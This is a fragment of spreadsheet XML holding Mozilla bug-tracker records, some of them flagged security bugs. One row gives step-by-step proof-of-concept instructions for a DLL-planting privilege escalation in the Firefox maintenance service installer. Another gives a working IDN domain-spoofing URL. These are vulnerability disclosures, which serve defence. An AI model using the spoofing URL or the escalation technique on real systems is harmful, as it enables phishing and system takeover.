      </c>
      <c r="G3071" t="n">
        <v>3</v>
      </c>
      <c r="H3071" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3071" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3071" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K3071" t="inlineStr">
        <is>
          <t>Firefox 89</t>
        </is>
      </c>
      <c r="L3071" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3071" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N3071" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3071" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3071" t="inlineStr">
        <is>
          <t>[psm-assigned][post-critsmash-triage][adv-main107+]</t>
        </is>
      </c>
      <c r="Q3071" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3071" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S3071" t="inlineStr">
        <is>
          <t>107 Branch</t>
        </is>
      </c>
      <c r="T3071" t="n">
        <v>1</v>
      </c>
      <c r="U3071" t="n">
        <v>0</v>
      </c>
      <c r="V3071" t="n">
        <v>18</v>
      </c>
      <c r="W3071" t="inlineStr">
        <is>
          <t>Adding a security exception for a site with a mismatched cert should allow access without a warning only as long as the exception exists. However, if you delete an exception, then visit the site again, FF shows no warning. You have to restart FF for the warning to appear again.
STR:
1. Visit https://download.windowsupdate.com/d/upgr/2021/03/windows10.0-kb5000736-x64_880844224a175033802b3d7a1f40ec304c0548dd.msu .
2. Notice the warning [1]
3. Add a security exception for the site.
4. Cancel the download.
5. Remove the security exception at tools/settings/certificates/view certificates/servers.
6. Open a new tab and visit the site again. Notice that FF offers to download the file without giving a warning. Cancel the download.
7. Restart FF.
8. Visit the site again.
9. Notice the warning.
[1] Hey Microsoft! Why isn't your cert correct?!?!</t>
        </is>
      </c>
      <c r="X3071" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3072">
      <c r="A3072" t="n">
        <v>987140</v>
      </c>
      <c r="B3072" t="inlineStr">
        <is>
          <t>2014-03-24 08:18:15 -0700</t>
        </is>
      </c>
      <c r="C3072" t="inlineStr">
        <is>
          <t>ASAN heap-use-after-free in nsGenericHTMLElement::GetWidthHeightForImage</t>
        </is>
      </c>
      <c r="D3072" t="inlineStr">
        <is>
          <t>2015-08-30 12:00:55 -0700</t>
        </is>
      </c>
      <c r="E3072" t="n">
        <v>1</v>
      </c>
      <c r="F3072" t="n">
        <v>1</v>
      </c>
      <c r="G3072" t="n">
        <v>3</v>
      </c>
      <c r="H3072" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3072" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3072" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3072" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3072" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3072" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3072" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3072" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3072" t="inlineStr">
        <is>
          <t>[asan][adv-main29+][adv-esr24.5+]</t>
        </is>
      </c>
      <c r="Q3072" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3072" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3072" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T3072" t="n">
        <v>1</v>
      </c>
      <c r="U3072" t="n">
        <v>0</v>
      </c>
      <c r="V3072" t="n">
        <v>18</v>
      </c>
      <c r="W3072" t="inlineStr">
        <is>
          <t>Created attachment 8395671
testcase.html
The attached test case crashes the latest ASAN build of Firefox. ASAN output attached in crash.txt.
The imgLoader object is freed while setting a new src in the onresize event handler.</t>
        </is>
      </c>
      <c r="X3072" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3073">
      <c r="A3073" t="n">
        <v>1354117</v>
      </c>
      <c r="B3073" t="inlineStr">
        <is>
          <t>2017-04-06 06:32:54 -0700</t>
        </is>
      </c>
      <c r="C3073" t="inlineStr">
        <is>
          <t>On startup of a photon browser, migrate customized items from the hamburger panel to the overflow panel</t>
        </is>
      </c>
      <c r="D3073" t="inlineStr">
        <is>
          <t>2018-04-22 07:44:23 -0700</t>
        </is>
      </c>
      <c r="E3073" t="n">
        <v>1</v>
      </c>
      <c r="F3073" t="n">
        <v>1</v>
      </c>
      <c r="G3073" t="n">
        <v>2</v>
      </c>
      <c r="H3073" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3073" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3073" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K3073" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L3073" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3073" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3073" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3073" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3073" t="inlineStr">
        <is>
          <t>[photon-structure]</t>
        </is>
      </c>
      <c r="Q3073" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3073" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3073" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T3073" t="n">
        <v>1</v>
      </c>
      <c r="U3073" t="n">
        <v>1</v>
      </c>
      <c r="V3073" t="n">
        <v>75</v>
      </c>
      <c r="W3073" t="inlineStr">
        <is>
          <t>See bug 1354083.
When browser.photon.menusRefresh (or whatever) is true, and wasn't the previous run, CustomizableUI should:
- get a list of items that were in the hamburger menu
- remove all the items that are in the default set for the hamburger menu
- append those items to the overflow menu set
- remove the stored data for the hamburger menu
- store the data again
When the pref is false, and wasn't the previous run, we do the opposite:
- get a list of items that were in the permanent overflow menu
- remove all the items that are in the default set for the *hamburger* menu
- append those items to the hamburger menu set
- remove the stored data for the overflow menu
- store the data again
This will lose ordering information and removed items out of default-set hamburger menu items if you go from australis-&gt;photon-&gt;australis. That seems an acceptable trade-off given that we'll need to store a lot more stuff if we want to keep that (and ordering/removal seems significantly less important than customized/added items generally).
This will not only help while we're developing and channel-migrating, but should also do the Right Thing for add-on buttons from existing profiles on the first Photon startup (though once we're confident we're shipping we should probably remove the pref...). Seeing as we need to do that kind of thing once already for a UI migration, putting this into CUI.jsm and doing testing with it seems like the sensible thing to do.
Potential bonus: in theory we could do this at runtime with a pref observer, too, if we ever end up supporting flipping the photon prefs at runtime (not a priority, though).</t>
        </is>
      </c>
      <c r="X3073" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3074">
      <c r="A3074" t="n">
        <v>1030401</v>
      </c>
      <c r="B3074" t="inlineStr">
        <is>
          <t>2014-06-25 15:13:35 -0700</t>
        </is>
      </c>
      <c r="C3074" t="inlineStr">
        <is>
          <t>Some bugs are missing their summaries on the bug suggestions tab</t>
        </is>
      </c>
      <c r="D3074" t="inlineStr">
        <is>
          <t>2014-07-16 07:38:09 -0700</t>
        </is>
      </c>
      <c r="E3074" t="n">
        <v>1</v>
      </c>
      <c r="F3074" t="n">
        <v>1</v>
      </c>
      <c r="G3074" t="n">
        <v>7</v>
      </c>
      <c r="H3074" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3074" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3074" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3074" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3074" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3074" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3074" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3074" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3074" t="inlineStr"/>
      <c r="Q3074" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3074" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3074" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3074" t="n">
        <v>1</v>
      </c>
      <c r="U3074" t="n">
        <v>0</v>
      </c>
      <c r="V3074" t="n">
        <v>4</v>
      </c>
      <c r="W3074" t="inlineStr">
        <is>
          <t>Created attachment 8446186
treeherder-missing-text.jpg
When I clicked on https://treeherder.mozilla.org/ui/#/jobs?repo=mozilla-inbound&amp;revision=bcd72aabb661 and then clicked on the Mnw job, the first two bugs dont have any text. 
I am assuming we aren't encoding &lt; properly.</t>
        </is>
      </c>
      <c r="X3074" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3075">
      <c r="A3075" t="n">
        <v>698245</v>
      </c>
      <c r="B3075" t="inlineStr">
        <is>
          <t>2011-10-29 23:23:02 -0700</t>
        </is>
      </c>
      <c r="C3075" t="inlineStr">
        <is>
          <t>TryChooser Syntax Builder has mixed content errors because it loads Javascript and CSS from http://ajax.googleapis.com</t>
        </is>
      </c>
      <c r="D3075" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3075" t="n">
        <v>1</v>
      </c>
      <c r="F3075" t="n">
        <v>1</v>
      </c>
      <c r="G3075" t="n">
        <v>5</v>
      </c>
      <c r="H3075" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3075" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3075" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3075" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3075" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3075" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3075" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3075" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3075" t="inlineStr"/>
      <c r="Q3075" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3075" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3075" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3075" t="n">
        <v>1</v>
      </c>
      <c r="U3075" t="n">
        <v>0</v>
      </c>
      <c r="V3075" t="n">
        <v>6</v>
      </c>
      <c r="W3075" t="inlineStr">
        <is>
          <t>IMO, we shouldn't be relying on Google hosting this for us, and definitely we shouldn't be loading non-HTTPS JS on a mozilla.org site.
&lt;link href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css" rel="stylesheet" type="text/css"/&gt;
&lt;script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"&gt;&lt;/script&gt;</t>
        </is>
      </c>
      <c r="X3075" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3076">
      <c r="A3076" t="n">
        <v>1596372</v>
      </c>
      <c r="B3076" t="inlineStr">
        <is>
          <t>2019-11-14 03:00:08 -0800</t>
        </is>
      </c>
      <c r="C3076" t="inlineStr">
        <is>
          <t>How should we surface measurement units in Graphs view?</t>
        </is>
      </c>
      <c r="D3076" t="inlineStr">
        <is>
          <t>2020-04-10 05:04:57 -0700</t>
        </is>
      </c>
      <c r="E3076" t="n">
        <v>1</v>
      </c>
      <c r="F3076" t="n">
        <v>1</v>
      </c>
      <c r="G3076" t="n">
        <v>7</v>
      </c>
      <c r="H3076" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3076" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3076" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K3076" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3076" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3076" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3076" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3076" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3076" t="inlineStr"/>
      <c r="Q3076" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3076" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3076" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3076" t="n">
        <v>1</v>
      </c>
      <c r="U3076" t="n">
        <v>0</v>
      </c>
      <c r="V3076" t="n">
        <v>4</v>
      </c>
      <c r="W3076" t="inlineStr">
        <is>
          <t>Bug 1584947 will surface for the 1st time the measurement units for perf data *(when they're provided)*.
It'll mostly do its job, but we need to decide if we could improve it, once it lands.</t>
        </is>
      </c>
      <c r="X3076" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3077">
      <c r="A3077" t="n">
        <v>961676</v>
      </c>
      <c r="B3077" t="inlineStr">
        <is>
          <t>2014-01-20 04:03:38 -0800</t>
        </is>
      </c>
      <c r="C3077" t="inlineStr">
        <is>
          <t>Unsafe temp directory usage in maintenservice_installer.exe lead to possible privilege escalation</t>
        </is>
      </c>
      <c r="D3077" t="inlineStr">
        <is>
          <t>2024-05-30 08:32:11 -0700</t>
        </is>
      </c>
      <c r="E3077" t="n">
        <v>1</v>
      </c>
      <c r="F3077" t="n">
        <v>1</v>
      </c>
      <c r="G3077" t="n">
        <v>2</v>
      </c>
      <c r="H3077" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3077" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3077" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K3077" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3077" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3077" t="inlineStr">
        <is>
          <t>Windows Phone 7</t>
        </is>
      </c>
      <c r="N3077" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3077" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3077" t="inlineStr">
        <is>
          <t>[adv-main29+][adv-esr24.5+] local privilege escalation</t>
        </is>
      </c>
      <c r="Q3077" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3077" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3077" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T3077" t="n">
        <v>1</v>
      </c>
      <c r="U3077" t="n">
        <v>0</v>
      </c>
      <c r="V3077" t="n">
        <v>19</v>
      </c>
      <c r="W3077" t="inlineStr">
        <is>
          <t>Created attachment 8362475
poc.rar
I have seen the following behavior with windows 7 32bit and the maintenservice_installer.exe which is for example executed during an update process with the mozilla maintenance service.
The installer creates during execution a file with the following name format and executes the file:
C:\Windows\Temp\ns{random character a-z generated with GetTickCount%26}{16bit hex value from GetTickCount()}.tmp\ns{16bit hex value from GetTickCount()}.tmp
For example: C:\Windows\Temp\nscFF1B.tmp\nsFFCA.tmp
It is possible to force the executable to load dlls from the current directory with an „executable.local” dirctory in the directory of the executable (windows specific feature). 
For the example with a ”C:\Windows\Temp\nsFF1B.tmp\nsFFCA.tmp.local” directory, the dlls loaded from the nsFFCA.tmp executable will be first searched in the nsFFCA.tmp.local directory, then in the nscFF1B.tmp directory and at least at the system path.
Because the temp directory is writable for normal users and the path is easy to  guess because of the use of GetTickCount() there is a privilege escalation vulnerability.
POC:
To try out the poc you need firefox 26.0 with the maintenance service installed and a 32bit windows.  I used windows 7. My poc tries to force the executable to load a fake mcrvrt.dll from the directory to start a calc.exe with system rights. Because of GetTickCount() this attack is timing dependent.
Steps:
1.) download poc and extract the files
2.) copy the updater.exe from the firefox directory to the poc/update directory
3.) download http://ftp.mozilla.org/pub/mozilla.org/firefox/releases/26.0/update/win32/en-US/firefox-26.0.complete.mar and save the file as update.mar in the poc/update directory
4.) alter the paths in update.bat to your paths
5.) start poc.exe
6.) start update.bat
7.) wait for output from poc.exe
8.) check for calc.exe
9.) if no calc.exe found, start update again
With windows 7 64bit no executable is loaded in the temp directory, so this will not work but maybe there is another way. Maybe the source of this vulnerability is in the nullsoft installer system and not in the script to create the installer, so maybe it's a general nsis problem.</t>
        </is>
      </c>
      <c r="X3077" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3078">
      <c r="A3078" t="n">
        <v>1390980</v>
      </c>
      <c r="B3078" t="inlineStr">
        <is>
          <t>2017-08-16 10:52:28 -0700</t>
        </is>
      </c>
      <c r="C3078" t="inlineStr">
        <is>
          <t>Domain spoofing thanks to U+0F8C rendered as 'space' on Mac OS 10.11</t>
        </is>
      </c>
      <c r="D3078" t="inlineStr">
        <is>
          <t>2024-05-30 09:36:01 -0700</t>
        </is>
      </c>
      <c r="E3078" t="n">
        <v>1</v>
      </c>
      <c r="F3078" t="n">
        <v>1</v>
      </c>
      <c r="G3078" t="n">
        <v>2</v>
      </c>
      <c r="H3078" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3078" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3078" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K3078" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3078" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3078" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3078" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3078" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3078" t="inlineStr">
        <is>
          <t>[adv-main56+][adv-esr52.4+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3078" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3078" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3078" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T3078" t="n">
        <v>1</v>
      </c>
      <c r="U3078" t="n">
        <v>0</v>
      </c>
      <c r="V3078" t="n">
        <v>18</v>
      </c>
      <c r="W3078" t="inlineStr">
        <is>
          <t>http://important-domain.google.xn--com-lumaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.xn--cfdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.bntk.pl/</t>
        </is>
      </c>
      <c r="X3078" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3079">
      <c r="A3079" t="n">
        <v>100213</v>
      </c>
      <c r="B3079" t="inlineStr">
        <is>
          <t>2001-09-17 17:44:53 -0700</t>
        </is>
      </c>
      <c r="C3079" t="inlineStr">
        <is>
          <t>M094 crash [@ GetOCSPResponders]</t>
        </is>
      </c>
      <c r="D3079" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E3079" t="n">
        <v>1</v>
      </c>
      <c r="F3079" t="n">
        <v>1</v>
      </c>
      <c r="G3079" t="n">
        <v>6</v>
      </c>
      <c r="H3079" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3079" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3079" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K3079" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L3079" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3079" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N3079" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3079" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3079" t="inlineStr">
        <is>
          <t>has-review, has-super-review,PDT+</t>
        </is>
      </c>
      <c r="Q3079" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3079" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3079" t="inlineStr">
        <is>
          <t>psm2.1</t>
        </is>
      </c>
      <c r="T3079" t="n">
        <v>1</v>
      </c>
      <c r="U3079" t="n">
        <v>0</v>
      </c>
      <c r="V3079" t="n">
        <v>20</v>
      </c>
      <c r="W3079" t="inlineStr">
        <is>
          <t>Not sure if this is really a security bug or a psm bug or something else, but it
is a topcrasher with Mozilla 0.9.4.  Here is the latest info from Talkback
topcrash reports:
GetOCSPResponders   65 
BBID range: 35401624 - 35502866
Min/Max Seconds since last crash: 8 - 62105
Min/Max Runtime: 15 - 62265
Crash data range: 2001-09-14 to 2001-09-17
Build ID range: 2001091311 to 2001091311
Stack Trace: 
	 GetOCSPResponders
[d:\builds\seamonkey\mozilla\security\manager\ssl\src\nsNSSCertificate.cpp  line
3278]
	 nsOCSPResponder::CompareEntries
[d:\builds\seamonkey\mozilla\security\manager\ssl\src\nsNSSCertificate.cpp  line
3262]
	 nsGenericFactory::CreateInstance
[d:\builds\seamonkey\mozilla\xpcom\components\nsGenericFactory.cpp  line 62]
	 nsComponentManagerImpl::CreateInstance
[d:\builds\seamonkey\mozilla\xpcom\components\nsComponentManager.cpp  line 1285]
	 nsComponentManager::CreateInstance
[d:\builds\seamonkey\mozilla\xpcom\components\nsRepository.cpp  line 82]
	 nsServiceManagerImpl::GetService
[d:\builds\seamonkey\mozilla\xpcom\components\nsServiceManager.cpp  line 345]
	 nsServiceManager::GetService
[d:\builds\seamonkey\mozilla\xpcom\components\nsServiceManager.cpp  line 560]
	 nsGetServiceByCID::operator()
[d:\builds\seamonkey\mozilla\xpcom\components\nsServiceManager.cpp  line 48]
	 nsCOMPtr_base::assign_from_helper
[d:\builds\seamonkey\mozilla\xpcom\base\nsCOMPtr.cpp  line 66]
	 nsFormFrame::OnSubmit
[d:\builds\seamonkey\mozilla\layout\html\forms\src\nsFormFrame.cpp  line 708]
	 nsHTMLFormElement::DoSubmitOrReset
[d:\builds\seamonkey\mozilla\content\html\content\src\nsHTMLFormElement.cpp 
line 518]
	 nsHTMLFormElement::HandleDOMEvent
[d:\builds\seamonkey\mozilla\content\html\content\src\nsHTMLFormElement.cpp 
line 462]
	 PresShell::HandleDOMEventWithTarget
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp  line 5708]
	 nsFormControlHelper::DoManualSubmitOrReset
[d:\builds\seamonkey\mozilla\layout\html\forms\src\nsFormControlHelper.cpp  line
1002]
	 nsImageControlFrame::MouseClicked
[d:\builds\seamonkey\mozilla\layout\html\forms\src\nsImageControlFrame.cpp  line
463]
	 nsHTMLInputElement::HandleDOMEvent
[d:\builds\seamonkey\mozilla\content\html\content\src\nsHTMLInputElement.cpp 
line 1265]
	 PresShell::HandleEventInternal
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp  line 5660]
	 PresShell::HandleEventWithTarget
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp  line 5630]
	 nsEventStateManager::CheckForAndDispatchClick
[d:\builds\seamonkey\mozilla\content\events\src\nsEventStateManager.cpp  line 2466]
	 nsEventStateManager::PostHandleEvent
[d:\builds\seamonkey\mozilla\content\events\src\nsEventStateManager.cpp  line 1552]
	 PresShell::HandleEventInternal
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp  line 5681]
	 PresShell::HandleEvent
[d:\builds\seamonkey\mozilla\layout\html\base\src\nsPresShell.cpp  line 5585]
	 nsView::HandleEvent
[d:\builds\seamonkey\mozilla\view\src\nsView.cpp  line 377]
	 nsViewManager::DispatchEvent
[d:\builds\seamonkey\mozilla\view\src\nsViewManager.cpp  line 2058]
	 HandleEvent
[d:\builds\seamonkey\mozilla\view\src\nsView.cpp  line 68]
	 nsWindow::DispatchEvent
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp  line 732]
	 nsWindow::DispatchWindowEvent
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp  line 749]
	 nsWindow::DispatchMouseEvent
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp  line 4264]
	 ChildWindow::DispatchMouseEvent
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp  line 4514]
	 nsWindow::ProcessMessage
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp  line 3251]
	 nsWindow::WindowProc
[d:\builds\seamonkey\mozilla\widget\src\windows\nsWindow.cpp  line 997]
	 KERNEL32.DLL + 0x363b (0xbff7363b)
	 KERNEL32.DLL + 0x24407 (0xbff94407)
	 0x00688b62
 	Source File :
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/security/manager/ssl/src/nsNSSCertificate.cpp
line : 3278
     (35492170)	URL: www.dell.fr
(35492170)
Comments: Simply open a list of options
     (35491369)	URL: http://www.dvdinside.de/dvd-inside/
(35491369)
Comments: - i clicked on the link "Preissuche"- i entered a title in the
searchfield of the form "Verschollen"- i clicked on "Suche starten"****Error
     (35488097)	Comments: query bugs about mozilla-mail on mozilla.org
     (35487801)	URL: http://www.useit.com/
(35487801)
Comments: clicking the search button.having checked with one other form  i get
the impression that this crash will occur on any form submission to any site.
     (35487137)	URL: http://www.livejournal.com/login.bml
(35487137)
Comments: submitted form with livejournal.com username and password
     (35486565)	Comments: clicking on a link www.heise.de "ilink" Montorit is the first crash...
     (35465925)	Comments: It crashes after any form submission (both POST and GET)  had no
problems with Mozilla 0.9.3
     (35464358)	URL: www.google.ca
(35464125)
URL: www.chalktv.com
(35457987)
URL: http://komodo.mozilla.org/buster
(35457511)
URL: www.chalktv.com
(35457449)
URL: www.chalktv.com
(35456977)
URL: www.x.themes.org
(35440169)
URL: www.google.com
(35440169)
Comments: typed in text and clicked on search
     (35431927)	URL: mail.yahoo.com
     (35431927)	Comments: Attempting to login with password.  This version consistently
crashes whenever submitting form information.
     (35425112)	URL: www.google.com
(35425112)
Comments: starting a search in a new window
     (35420848)	URL: www.hotmail.com
(35420848)
Comments: I put in my user name and password  clicked "submit" (or whatever the
button is)  and it crashed.  This immediately after installing .9.4 over .9.3.
     (35414218)	URL: http://www.whowhere.com
(35409541)
Comments: I can't seem to submit any form information via http post.  I've tried
this on several sites now.  I'm going to try uninstalling mozilla entirely and
re-install .9.4 from scratch rather than over .9.3.
     (35407404)	Comments: I pressed a a submit button..  [:(] 
(35407349)
Comments: If I click *any* submit button on *any* HTML page  Mozilla
0.94crashes.  [:(] 
(35406665)
URL: www.sf.net
(35406665)
Comments: tried to do a search at this site
     (35404852)	Comments: I was accessing a drop-down box.
     (35402987)	URL: http://www.slashdot.org/
(35402987)
Comments: I was on the slashdot site logged in under my user account.  I was
looking at the main page.1. I clicked on one of the links to view the comments
of a particular article (under the article it says 2 of 93 comments--i clicked
on the 93).  2. While
     (35402987)	Comments:  the page was loading  I realized I wanted to see the comments at
-1 flat--not -1 threaded.  So i changed the dropdown from threaded to flat and
clicked submit on the page that was loading.  3. Then it crashed.I can reproduce
the problem following
     (35402987)	Comments:  these steps regularly.
     (35401760)	URL: www.google.com
(35401760)
Comments: selected the url from the quick dropdown list
It is happening across all Win32 platforms.</t>
        </is>
      </c>
      <c r="X3079" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3080">
      <c r="A3080" t="n">
        <v>750066</v>
      </c>
      <c r="B3080" t="inlineStr">
        <is>
          <t>2012-04-29 07:31:09 -0700</t>
        </is>
      </c>
      <c r="C3080" t="inlineStr">
        <is>
          <t>Out of bounds read in nsHTMLReflowState::CalculateHypotheticalBox, with nested multi-column, relative position, and absolute position</t>
        </is>
      </c>
      <c r="D3080" t="inlineStr">
        <is>
          <t>2024-05-29 16:00:45 -0700</t>
        </is>
      </c>
      <c r="E3080" t="n">
        <v>1</v>
      </c>
      <c r="F3080" t="n">
        <v>1</v>
      </c>
      <c r="G3080" t="n">
        <v>3</v>
      </c>
      <c r="H3080" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3080" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3080" t="inlineStr">
        <is>
          <t>Layout: Block and Inline</t>
        </is>
      </c>
      <c r="K3080" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3080" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
